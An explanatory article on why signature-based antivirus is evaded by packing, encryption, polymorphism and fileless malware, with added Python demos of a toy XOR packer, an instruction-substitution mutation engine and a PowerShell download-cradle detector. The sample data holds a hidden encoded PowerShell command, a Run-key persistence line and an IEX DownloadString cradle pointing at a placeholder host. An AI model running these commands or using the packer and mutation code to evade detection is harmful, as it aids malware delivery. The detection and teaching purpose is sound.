Signature-based detection is a commonly used mechanism for antivirus solutions to identify known malware variants. The antivirus compares a unique fingerprint, or signature, of each known sample (a file hash or a distinctive byte pattern) to every file entering a computer or network. Any file that matches a signature is identified as malware and marked as malicious.
Unfortunately, signature-based detection is growing less and less effective. As cybercriminals adopt a variety of techniques to defeat it, detecting and eradicating malware infections increasingly requires other approaches, such as anomaly detection and runtime application self-protection (RASP).
Signature AV is Increasingly Ineffective
Estimates put the share of malware caught by signature-based antivirus at only about 50%. The reason is that malware authors increasingly use techniques designed specifically to defeat signature matching: code packing, encryption, polymorphism, and fileless execution.
Use of Packing
Many malware variants use "packing" to conceal the identifiable code and data of the malware. A packer compresses or otherwise obfuscates the malware's contents and prepends a small "unpacking stub" that is left in the clear. Once the packed file is on the target machine, the stub runs first, restores the original code in memory, and transfers control to it.
Because a wide range of packers exists (and malware authors can write their own), many tools that try to analyze malicious code statically (without running it) cannot reverse the obfuscation. As a result, signatures generated from the malware's unpacked code will not match the packed sample. What remains visible is the stub itself, so a scanner can still flag a known packer or treat an unusually high-entropy section as suspicious, but that tells it a file is packed, not which malware it carries.
Use of Encryption
A step up from simple packing or obfuscation is encrypting the malware body. Here the transformation is a real cipher rather than a reversible encoding, so the body cannot be recovered without the key.
Encrypting code that must run on the infected machine offers limited secrecy, because the malware itself needs the key to decrypt; the key therefore has to be stored alongside the ciphertext or inside the decryptor, where a forensic analyst can find and use it too. When the goal is only to frustrate or delay detection, however, shipping the ciphertext with the key embedded in the malware is enough: the file on disk contains none of the bytes a signature would match. (The exception is environmental keying, where the key is derived from properties of the intended target, so the payload decrypts only on that machine and stays opaque in a sandbox or an analyst's lab.)
Packing and encryption defeat signature matching by static scanners, but they are not a complete solution. Some security products execute suspicious code in a sandbox, where the malware's own unpacking or decryption routine runs and reveals the deobfuscated code and data; at that point, traditional signatures can be matched against the unpacked image in memory. In response, many samples check for sandbox or debugger artifacts and refuse to unpack when they find them, which is why unpacking and sandbox evasion remain an ongoing contest.
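The packing and encryption sections above can be illustrated end to end. The following is an added example, not code from the original article: a toy packer whose output embeds its XOR key, the clear-text stub that recovers the payload, and the two scans a defender can run against it. Everything here is constructed for illustration: the "malware body" is a made-up text payload, the signature is a fixed byte pattern chosen for that payload, and the entropy calculation stands in for the anomaly heuristic that flags packed sections.

```python
import hashlib
import math
import zlib

# Constructed stand-in for a malware body (not a real sample).
PAYLOAD = (b"cmd.exe /c powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=\n"
           b"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upd /d C:\\tmp\\upd.exe\n") * 3
# A byte-pattern signature an analyst might write for the plaintext body.
SIGNATURE = b"powershell -w hidden -enc"


def pack(payload: bytes, key: bytes) -> bytes:
    """Packer side: compress, then XOR with a key that is embedded in the output
    (one length byte, the key, then the transformed body). Real packers and
    crypters must do the same, since the stub needs the key at run time."""
    compressed = zlib.compress(payload, 9)
    body = bytes(b ^ key[i % len(key)] for i, b in enumerate(compressed))
    return bytes([len(key)]) + key + body


def unpack_stub(blob: bytes) -> bytes:
    """The unpacking stub: the small clear-text routine that rebuilds the payload
    in memory. This is what actually executes when the sample is detonated."""
    klen = blob[0]
    key, body = blob[1:1 + klen], blob[1 + klen:]
    compressed = bytes(b ^ key[i % klen] for i, b in enumerate(body))
    return zlib.decompress(compressed)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0..8). Compressed or encrypted regions sit far above
    code or text, which is the classic anomaly heuristic for packed files."""
    if not data:
        return 0.0
    n = len(data)
    counts = [data.count(bytes([v])) for v in range(256)]
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def static_scan(blob: bytes, signature: bytes = SIGNATURE) -> dict:
    """What a static scanner sees: the signature is absent from the packed bytes
    and the hash does not match the known sample; only the entropy stands out."""
    return {"signature_hit": signature in blob,
            "hash": sha256(blob),
            "entropy": round(shannon_entropy(blob), 2)}


def sandbox_scan(blob: bytes, signature: bytes = SIGNATURE) -> dict:
    """What a sandbox sees: let the stub run, then scan the unpacked image.
    (A real sample may first check for a sandbox and refuse to unpack.)"""
    unpacked = unpack_stub(blob)
    return {"signature_hit": signature in unpacked,
            "hash": sha256(unpacked)}


if __name__ == "__main__":
    blob = pack(PAYLOAD, b"\x13\x37\xc0\xde\xfa\xce\xb0\x0b")
    print("plaintext entropy:", round(shannon_entropy(PAYLOAD), 2))
    print("static:          ", static_scan(blob))
    print("sandbox:         ", sandbox_scan(blob))
```

The static scan never sees the signature and reports a hash that matches nothing, yet the entropy of the packed region is well above that of the plaintext; the sandbox scan recovers both the signature hit and the original hash once the stub has run. The same structure applies when the XOR step is replaced by a real cipher: the key still travels with the sample, so the only thing that changes is how much work the analyst has to do to find it.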
Polymorphic Malware
Polymorphic malware takes a different approach to defeating signature detection. Rather than hiding the portions of itself that a signature could match, it ensures that no two copies of itself share the same bytes, so a signature derived from one copy does not match the next.
It does this by transforming its own code in ways that do not change its behavior. Many low-level instructions (such as setting a register to zero) can be encoded in several different ways, and the order of independent instructions or the register chosen for a temporary value can be varied freely. Strictly speaking, rewriting the body this way is often called metamorphism; a classic polymorphic engine instead re-encrypts the body with a fresh key for each copy and mutates only the small decryptor loop. The effect on file-level signatures is the same.
Swapping a single instruction for an equivalent one does not affect the malware's operation, but it gives the two copies completely different file hashes and breaks any byte-pattern signature that spans the changed instruction. Since file hashes are widely used to identify malware variants, this simple change makes hash-based signatures useless against the family. Detection then has to rely on something the mutation does not change: the behavior of the code, or a normalized form of it in which equivalent instruction sequences are mapped to one canonical encoding. Polymorphism is so effective against signatures that estimates of the share of modern malware that is polymorphic run as high as 93%.
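The instruction-substitution idea above, as an added example that is not part of the original article. The "malware body" is a constructed 32-bit x86 byte sequence with two mutation points, the equivalence table covers only a handful of encodings, and the detector's canonicalizer is a deliberately simple longest-match rewrite rather than a real disassembler; all of that is an assumption for illustration. The example shows the engine producing copies with distinct hashes, a raw byte-pattern signature missing most of them, and the same signature matching every copy once the bytes are normalized.

```python
import hashlib
import random

# Semantically equivalent 32-bit x86 encodings. The first entry of each class is
# the canonical form the detector normalizes to; the engine may emit any member.
EQUIV_CLASSES = {
    "zero_eax": [b"\x31\xc0",               # xor eax, eax
                 b"\x29\xc0",               # sub eax, eax
                 b"\xb8\x00\x00\x00\x00"],  # mov eax, 0
    "nop":      [b"\x90",                   # nop
                 b"\x89\xc0",               # mov eax, eax
                 b"\x8d\x40\x00"],          # lea eax, [eax+0]
}

# Constructed malware "body": class names are mutation points, bytes are fixed.
TEMPLATE = ["zero_eax", b"\x50",                 # push eax
            "nop",
            b"\x68\x65\x76\x69\x6c",             # push 0x6c697665 ('evil')
            "zero_eax", b"\xc3"]                 # ret


def make_variant(rng: random.Random) -> bytes:
    """The polymorphic engine: pick a random equivalent encoding at each mutation point."""
    return b"".join(rng.choice(EQUIV_CLASSES[t]) if isinstance(t, str) else t for t in TEMPLATE)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def canonicalize(code: bytes) -> bytes:
    """Detector side: greedily rewrite every known equivalent encoding to its
    class's canonical form, leaving other bytes untouched. Real engines get this
    from a disassembler or emulator; on this constructed body a table scan suffices."""
    # (encoding, canonical), longest encodings first so 'b8 00 00 00 00' wins over shorter hits
    table = sorted(((enc, members[0]) for members in EQUIV_CLASSES.values() for enc in members),
                   key=lambda p: -len(p[0]))
    out, i = bytearray(), 0
    while i < len(code):
        for enc, canon in table:
            if code.startswith(enc, i):
                out += canon
                i += len(enc)
                break
        else:
            out.append(code[i])
            i += 1
    return bytes(out)


CANONICAL = canonicalize(make_variant(random.Random(0)))
# A byte-pattern signature written from one analysed copy: 'xor eax,eax; push eax'.
RAW_SIGNATURE = b"\x31\xc0\x50"


def exact_hits(variants, signature: bytes = RAW_SIGNATURE) -> int:
    """How many copies a fixed byte-pattern signature catches."""
    return sum(signature in v for v in variants)


def normalized_hits(variants, signature: bytes = RAW_SIGNATURE) -> int:
    """How many copies the same signature catches after canonicalization."""
    return sum(signature in canonicalize(v) for v in variants)


def distinct_hashes(variants) -> int:
    return len({sha256(v) for v in variants})


if __name__ == "__main__":
    rng = random.Random(42)
    samples = [make_variant(rng) for _ in range(30)]
    print("copies:", len(samples), "distinct hashes:", distinct_hashes(samples))
    print("raw signature hits:", exact_hits(samples), "normalized hits:", normalized_hits(samples))
    print("canonical form:", CANONICAL.hex())
```

With two three-way mutation points and one more for the filler instruction, the engine has 27 distinct encodings of the same program, and every one hashes differently. The greedy table rewrite is only safe here because the constructed body contains no literal byte that collides with a table entry; against real code the normalization has to follow actual instruction boundaries, which is why production engines disassemble or emulate before matching.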
Fileless Malware
Signature-based detection works by comparing a file containing potentially malicious code to a library of signatures of known malware variants. This only works if there is a file of malicious code to compare against.
Fileless malware is designed to "live off the land" by taking advantage of legitimate functionality built into the target system. Tools like Windows PowerShell are extremely powerful, and an attacker can often achieve their objective with a few PowerShell commands launched by a macro in a malicious Word document, keeping the payload in memory rather than writing it to disk.
When that is not enough, the malicious document can act as a downloader, fetching malicious code protected by one of the other mechanisms described here.
Fileless malware is effective because there is no payload file on disk for signature-based detection to examine, and it is increasingly popular with malware authors for that reason. It is not invisible, though: the document that launches it is still a file, and the command line, script content, and network activity of the processes it abuses can still be inspected (on Windows, PowerShell script block logging and AMSI expose script contents even when they were never written to disk).
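What "no file to scan" leaves a defender is the process telemetry around the abused tool. The following is an added example, not code from the original article: a small detector for the Office-launches-PowerShell download cradle described above, run over constructed process-creation events. The event format is a made-up `parent=... image=... cmdline=...` layout rather than any vendor's real schema, the indicator list and weights are illustrative, and `example.com` is a placeholder host. It also shows how `-EncodedCommand` is built (base64 over UTF-16LE) and decoded, so a cradle hidden in the encoding is scored the same as one typed in the clear.

```python
import base64
import re

# How an attacker produces -EncodedCommand: base64 over UTF-16LE script text.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode()

# Constructed process-creation events in a made-up 'key=value' layout
# (not any vendor's real schema). example.com is a placeholder host.
SAMPLE_LOGS = [
    f"parent=WINWORD.EXE image=powershell.exe cmdline=powershell -w hidden -nop -enc {ENCODED}",
    "parent=explorer.exe image=powershell.exe cmdline=powershell -File C:\\scripts\\backup.ps1",
    "parent=EXCEL.EXE image=powershell.exe cmdline=powershell -NoP -W Hidden "
    "IEX (New-Object Net.WebClient).DownloadString('http://example.com/b')",
    "parent=services.exe image=svchost.exe cmdline=svchost.exe -k netsvcs",
]

OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
# Common abbreviations of -EncodedCommand (PowerShell accepts unambiguous prefixes).
ENC_RE = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
LINE_RE = re.compile(r"parent=(\S+) image=(\S+) cmdline=(.*)")

# (name, regex over the effective command text, weight). Weights are illustrative.
PATTERNS = [
    ("hidden_window",   re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 1),
    ("no_profile",      re.compile(r"(?i)-nop(?:rofile)?\b"), 1),
    ("download_cradle", re.compile(r"(?i)\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile|"
                                   r"Net\.WebClient|Invoke-WebRequest|IWR)\b"), 3),
    ("url",             re.compile(r"(?i)https?://"), 1),
]
THRESHOLD = 5


def decode_encoded_command(cmdline: str) -> str:
    """Recover the script hidden behind -EncodedCommand, or '' if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable encoded command>"


def analyze(line: str) -> dict:
    """Score one event. Indicators are checked against the command line plus the
    decoded script, so a cradle hidden in base64 is still seen."""
    m = LINE_RE.match(line)
    if not m:
        return {"score": 0, "hits": [], "decoded": ""}
    parent, image, cmdline = m.groups()
    decoded = decode_encoded_command(cmdline)
    effective = cmdline + "\n" + decoded
    hits, score = [], 0
    if parent.upper() in OFFICE_PARENTS and "powershell" in image.lower():
        hits.append("office_parent"); score += 3
    if decoded:
        hits.append("encoded_command"); score += 2
    for name, rx, weight in PATTERNS:
        if rx.search(effective):
            hits.append(name); score += weight
    return {"score": score, "hits": hits, "decoded": decoded}


def scan(lines) -> list:
    """Indices of events whose score reaches the alert threshold."""
    return [i for i, line in enumerate(lines) if analyze(line)["score"] >= THRESHOLD]


if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_LOGS):
        r = analyze(line)
        print(f"[{i}] score={r['score']:2d} hits={r['hits']}")
        if r["decoded"]:
            print("     decoded:", r["decoded"])
    print("alert on:", scan(SAMPLE_LOGS))
```

The administrator's scheduled script (event 1) and the service host (event 3) score zero, while both Office-spawned cradles cross the threshold, the encoded one because its script is decoded before the indicators are applied. Matching on command lines alone is brittle (an attacker can split strings or invoke the cradle from a file), which is why the parent-process relationship carries the highest weight here and why script block logging or AMSI, which see the script after PowerShell has assembled it, are the stronger data sources in practice.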
Protecting Against Malware Threats
Signature-based detection of malware has been popular for a long time because it is simple and effective against known samples. Unique features of a malware sample can be extracted manually or automatically and turned into a signature against which every file entering a computer or network is compared.
However, the simplicity of signature detection also makes it easy to circumvent. Techniques like code packing, encryption, and polymorphism allow a malware sample to avoid detection based on signatures. With fileless malware, there is no file for the signature to match.
A detection rate of only about 50% means that signatures alone cannot protect endpoint devices against malware. Anomaly-based detection, which flags deviations from normal file or process behavior rather than known patterns, can catch malicious files that signatures miss, provided there is a file to examine.
In the case of fileless malware, where the malicious program uses legitimate applications to achieve its goals, a solution such as runtime application self-protection (RASP) may be necessary. RASP instruments a program and observes its inputs, outputs, and behavior from inside it; any abnormality triggers a response, so even fileless activity that passes through a protected application becomes detectable. Because RASP covers the applications it is deployed into, abuse of system tools such as PowerShell is caught by applying the same kind of behavioral monitoring to those processes, for example through endpoint detection and response tooling.